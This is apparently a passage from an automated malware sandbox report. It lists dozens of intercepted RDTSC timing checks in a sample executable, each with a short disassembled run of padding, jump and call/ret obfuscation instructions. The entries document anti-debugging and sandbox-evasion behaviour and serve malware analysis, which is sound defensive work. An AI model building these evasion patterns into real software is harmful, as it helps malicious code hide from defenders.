              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EAA0 second address: 136EACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4379442F69h 0x0000000e push ebx 0x0000000f je 00007F4379442F56h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop ebx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EACC second address: 136EAD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EAD1 second address: 136EAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1785 second address: 13E178B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E18D0 second address: 13E18D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1CCA second address: 13E1CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1CCE second address: 13E1CDA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4379442F56h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1CDA second address: 13E1CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2184 second address: 13E218B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B04 second address: 1364B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B08 second address: 1364B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7622 second address: 13E762C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E762C second address: 13E7630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E77C8 second address: 13E77D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E77D1 second address: 13E77E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4379442F56h 0x0000000a ja 00007F4379442F56h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C12 second address: 13E7C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C16 second address: 13E7C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C1A second address: 13E7C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C24 second address: 13E7C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E808C second address: 13E8092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E8092 second address: 13E8096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E8096 second address: 13E80AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA32h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E81EA second address: 13E820A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4379442F69h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E820A second address: 13E8214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4378D2BA26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E8214 second address: 13E8222 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4379442F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E8222 second address: 13E825A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F4378D2BA26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F4378D2BA50h 0x00000014 push ebx 0x00000015 jg 00007F4378D2BA26h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4378D2BA34h 0x00000023 jnc 00007F4378D2BA26h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13938C9 second address: 13938CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13938CD second address: 13938D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E8994 second address: 13E899A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E899A second address: 13E899F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E899F second address: 13E89AB instructions: 0x00000000 rdtsc 0x00000002 js 00007F4379442F5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E89AB second address: 13E89B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E719C second address: 13E71DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F5Dh 0x00000007 jmp 00007F4379442F5Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4379442F60h 0x00000016 jmp 00007F4379442F64h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA538 second address: 13EA556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378D2BA35h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA556 second address: 13EA55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA55C second address: 13EA57E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA57E second address: 13EA584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA584 second address: 13EA58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA58D second address: 13EA592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA592 second address: 13EA598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA598 second address: 13EA59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EA59E second address: 13EA5C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4378B444A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F4378B444B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B00F5 second address: 13B00F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B05C6 second address: 13B05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B05CA second address: 13B05E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B05E2 second address: 13B05F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4378B444ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B05F3 second address: 13B064E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 6BA00921h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F4378D5BDC8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 call 00007F4378D5BDD8h 0x0000002e mov ecx, ebx 0x00000030 pop edx 0x00000031 push 13E4070Bh 0x00000036 pushad 0x00000037 jnl 00007F4378D5BDC8h 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B06F3 second address: 13B0742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F4378B444B5h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f jnl 00007F4378B444B1h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 mov edx, eax 0x00000019 nop 0x0000001a jmp 00007F4378B444B4h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B0742 second address: 13B0747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B09EB second address: 13B09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F4378B444A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B09FB second address: 13B0A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F4378D5BDC8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000004h 0x00000027 mov ch, 82h 0x00000029 nop 0x0000002a pushad 0x0000002b jl 00007F4378D5BDC8h 0x00000031 pushad 0x00000032 popad 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B0A47 second address: 13B0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B0E35 second address: 13B0EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4378D5BDC8h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F4378D5BDC8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 0000001Eh 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F4378D5BDC8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 pushad 0x00000045 mov bx, ax 0x00000048 mov dword ptr [ebp+122D28FFh], edx 0x0000004e popad 0x0000004f mov dword ptr [ebp+1244A343h], ebx 0x00000055 nop 0x00000056 push esi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EDD48 second address: 13EDD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4378B444A6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EE1C5 second address: 13EE1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EE1CA second address: 13EE1DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4378B444B2h 0x00000008 jc 00007F4378B444A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EE1DA second address: 13EE1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135FC6B second address: 135FC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F0849 second address: 13F0853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4378D5BDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1368092 second address: 13680A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13680A3 second address: 13680AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F319E second address: 13F31A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137226F second address: 137228B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4378D5BDD2h 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137228B second address: 1372296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1372296 second address: 137229A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137229A second address: 13722A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F8785 second address: 13F878B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F878B second address: 13F8791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B0C75 second address: 13B0C7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F975E second address: 13F9768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F9768 second address: 13F976D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FC12F second address: 13FC135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FC5C3 second address: 13FC5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FC5C9 second address: 13FC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FC5CF second address: 13FC5FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F4378D5BDD2h 0x0000000f js 00007F4378D5BDC8h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F4378D5BDC6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FC5FA second address: 13FC5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140093C second address: 140095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4378D5BDC6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007F4378D5BDCCh 0x00000011 jo 00007F4378D5BDC6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1400D45 second address: 1400D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1400EE7 second address: 1400EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1400EED second address: 1400EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1400EF1 second address: 1400EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140727F second address: 1407283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14076FA second address: 1407719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F4378D5BDD9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14079CE second address: 14079D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14081B9 second address: 14081C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14081C1 second address: 14081C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14081C7 second address: 14081E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDCFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14084F9 second address: 1408527 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4378B444A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F4378B444B2h 0x00000010 jmp 00007F4378B444ADh 0x00000015 popad 0x00000016 push ecx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1408527 second address: 140852D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1408AC0 second address: 1408AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136B5DF second address: 136B5E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BD32 second address: 140BD4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B5h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BD4D second address: 140BD53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BD53 second address: 140BD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BD59 second address: 140BD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BD5D second address: 140BD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BED7 second address: 140BEDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C07B second address: 140C081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C081 second address: 140C087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
